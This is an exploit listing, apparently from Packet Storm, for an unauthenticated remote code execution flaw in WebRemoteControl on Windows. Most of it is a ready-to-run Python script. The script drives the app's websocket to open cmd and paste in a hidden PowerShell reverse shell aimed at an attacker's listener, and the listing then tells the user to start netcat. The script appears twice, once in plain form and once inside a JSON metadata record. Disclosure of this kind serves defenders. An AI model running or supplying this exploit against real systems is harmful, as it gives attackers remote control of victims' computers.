📄 WebRemoteControl Unauthenticated Remote Code Execution_PACKETSTORM:218911

Description

WebRemoteControl suffers from an unauthenticated remote code execution vulnerability...

Basic Information

ID PACKETSTORM:218911

Published Apr 14, 2026 at 00:00

Affected Product

Affected Versions # Exploit Title: WebRemoteControl - Unauthenticated Remote Code Execution
# Date: 2026-04-14
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://github.com/wolfgangasdf/WebRemoteControl
# Software Link:
https://github.com/wolfgangasdf/WebRemoteControl/releases/download/SNAPSHOT/webremotecontrol-windows-x64.zip
# Version: SNAPSHOT
# Tested on: Windows 10

#!/usr/bin/env python3

import websocket, time

LHOST = "192.168.1.104"
LPORT = "4444"

ps_command = f'powershell -NoP -NonI -W Hidden -Exec Bypass -Command
"$client = New-Object
System.Net.Sockets.TCPClient(\'{LHOST}\',{LPORT});$stream =
$client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i =
$stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object
-TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback =
(iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' +
(pwd).Path + \'> \';$sendbyte =
([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()"'

ws = websocket.create_connection("ws://172.16.126.135:8000/docs/cmd",
timeout=5)
ws.recv()

print("[>] Moving to Start button...")
ws.send("move\t-2000\t2000")
time.sleep(0.5)

print("[>] Click Start button...")
ws.send("tap")
time.sleep(0.5)

print("[>] Typing 'cmd'...")
for c in "cmd":
ws.send(f"char\t{c}")
time.sleep(0.2)

time.sleep(0.5)
print("[>] Pressing Enter to open cmd...")
ws.send("char\t\n")
time.sleep(1)

print("[>] Pasting PowerShell reverse shell...")
ws.send(f"pastetext\t{ps_command}")
time.sleep(0.5)

print("[>] Pressing Enter to execute...")
ws.send("char\t\n")

ws.close()
print(f"[✓] Reverse shell sent to {LHOST}:{LPORT}! Start your listener: nc
-lvnp {LPORT}")

{
    "lastseen": "2026-04-14T17:29:28",
    "description": "WebRemoteControl suffers from an unauthenticated remote code execution vulnerability...",
    "published": "2026-04-14T00:00:00",
    "modified": "2026-04-14T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 WebRemoteControl Unauthenticated Remote Code Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:218911",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "# Exploit Title: WebRemoteControl - Unauthenticated Remote Code Execution\n    # Date: 2026-04-14\n    # Exploit Author: Chokri Hammedi\n    # Vendor Homepage: https://github.com/wolfgangasdf/WebRemoteControl\n    # Software Link:\n    https://github.com/wolfgangasdf/WebRemoteControl/releases/download/SNAPSHOT/webremotecontrol-windows-x64.zip\n    # Version: SNAPSHOT\n    # Tested on: Windows 10\n    \n    \n    #!/usr/bin/env python3\n    \n    import websocket, time\n    \n    LHOST = \"192.168.1.104\"\n    LPORT = \"4444\"\n    \n    ps_command = f'powershell -NoP -NonI -W Hidden -Exec Bypass -Command\n    \"$client = New-Object\n    System.Net.Sockets.TCPClient(\\'{LHOST}\\',{LPORT});$stream =\n    $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i =\n    $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object\n    -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback =\n    (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \\'PS \\' +\n    (pwd).Path + \\'> \\';$sendbyte =\n    ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()\"'\n    \n    ws = websocket.create_connection(\"ws://172.16.126.135:8000/docs/cmd\",\n    timeout=5)\n    ws.recv()\n    \n    print(\"[>] Moving to Start button...\")\n    ws.send(\"move\\t-2000\\t2000\")\n    time.sleep(0.5)\n    \n    print(\"[>] Click Start button...\")\n    ws.send(\"tap\")\n    time.sleep(0.5)\n    \n    print(\"[>] Typing 'cmd'...\")\n    for c in \"cmd\":\n        ws.send(f\"char\\t{c}\")\n        time.sleep(0.2)\n    \n    time.sleep(0.5)\n    print(\"[>] Pressing Enter to open cmd...\")\n    ws.send(\"char\\t\\n\")\n    time.sleep(1)\n    \n    print(\"[>] Pasting PowerShell reverse shell...\")\n    ws.send(f\"pastetext\\t{ps_command}\")\n    time.sleep(0.5)\n    \n    print(\"[>] Pressing Enter to execute...\")\n    ws.send(\"char\\t\\n\")\n    \n    ws.close()\n    print(f\"[\u2713] Reverse shell sent to {LHOST}:{LPORT}! Start your listener: nc\n    -lvnp {LPORT}\")",
    "sourceHref": "https://packetstorm.news/download/218911",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/218911/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply